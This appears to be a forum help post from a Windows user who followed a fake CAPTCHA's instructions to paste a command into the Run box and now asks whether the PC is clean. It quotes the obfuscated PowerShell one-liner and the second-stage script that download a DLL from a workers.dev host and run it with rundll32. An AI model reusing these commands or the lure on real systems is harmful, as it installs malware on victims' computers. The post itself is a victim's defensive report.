I was looking for a psychologist in my area. I did a search and I opened a result. I got a captcha. It asked me to press ctrl and R, press ctrl and V and then press enter. It was late at night and I wasn't focusing so I did it without thinking
Nothing happened after I pressed enter and then my antivirus which is ESET Home gave me an alert that it blocked something. I looked into it.
First I opened Wordpad and I pressed ctrl and V to see what was the command that I pasted. It was this:
That command was trying to open https://still-snow-667e(dot)protexweer(dot)workers(dot)dev/gd?id=98532882-12b5530d in a hidden PowerShell window. I opened that website in Windows Sandbox and I saw this:
That looks like it was trying to download text.dll which is the malware file and run it. I checked my downloads folder. There is no text.dll. Also I checked the ESET Home alerts to see what it blocked. I saw this. That means that ESET Home blocked the website that the hidden PowerShell window tried to open thus no malware was downloaded.
I did a full system scan by using ESET Home, EmiSoft emergency portable scanner and Kaspersky emergency portable scanner. No malware was found.
Thus I am safe and no need to wipe everything and reinstall Windows?
Nothing happened after I pressed enter and then my antivirus which is ESET Home gave me an alert that it blocked something. I looked into it.
First I opened Wordpad and I pressed ctrl and V to see what was the command that I pasted. It was this:
powershell -w h -ep bypass -c "$P='https://';$US='still-snow-667e.prot...b5530d';$c=[char]0x69 [char]0x65 [char]0x78;& $c (irm $P$US$L)"That command was trying to open https://still-snow-667e(dot)protexweer(dot)workers(dot)dev/gd?id=98532882-12b5530d in a hidden PowerShell window. I opened that website in Windows Sandbox and I saw this:
$downloadUrl="https://still-snow-667e(dot)protexweer(dot)workers(dot)dev/download?id=98532882-12b5530dnull";
(New-Object System.Net.WebClient).DownloadFile($downloadUrl, "$env:USERPROFILE\Downloads\text.dll");
Start-Process "rundll32.exe" "$env:USERPROFILE\Downloads\text.dll,Start source=98532882-12b5530d"
That looks like it was trying to download text.dll which is the malware file and run it. I checked my downloads folder. There is no text.dll. Also I checked the ESET Home alerts to see what it blocked. I saw this. That means that ESET Home blocked the website that the hidden PowerShell window tried to open thus no malware was downloaded.
I did a full system scan by using ESET Home, EmiSoft emergency portable scanner and Kaspersky emergency portable scanner. No malware was found.
Thus I am safe and no need to wipe everything and reinstall Windows?
My Computer
At a glance
windows 11i932GBRTX4090
- OS
- windows 11
- Computer type
- Laptop
- Manufacturer/Model
- Lenovo Legion Pro 7
- CPU
- i9
- Memory
- 32GB
- Graphics Card(s)
- RTX4090




